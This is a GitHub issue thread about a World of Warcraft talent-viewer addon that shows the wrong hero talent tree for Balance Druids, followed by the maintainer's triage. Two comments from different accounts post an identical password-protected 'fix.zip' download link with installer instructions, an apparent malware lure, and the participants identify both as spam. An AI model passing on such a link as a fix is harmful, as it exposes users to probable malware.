### ISSUE TITLE
Balance Druid's KotG option is wrong

### ISSUE THREAD

**Issue by nancikennedy** [NumyAddon/TalentTreeViewer#11]
In Retail, with the current version of TTV installed, The Keeper of the Grove talents are actually showing the Wildstalker ones...so importing strings doen't wok properly for hero talents.

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by nancikennedy** [comment]
Yeah....NO.

**Comment by Numynum** [comment]
Well that's a first for me, spambot on github xD

**Comment by nancikennedy** [comment]
> Well that's a first for me, spambot on github xD

lol, yeah. I was immediately suspicious and looking at their profile just reinforced it.

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Numynum** [comment]
another one.. wtf O.o
but I'll try look into it today
TWW release day though, so no promises 🙂

**Comment by Numynum** [comment]
interestingly, the correct hero talents _are_ actually displayed
but the wrong tree is displayed on top of it, so you can't actually use it 🙈 
should be able to fix it today 🙂
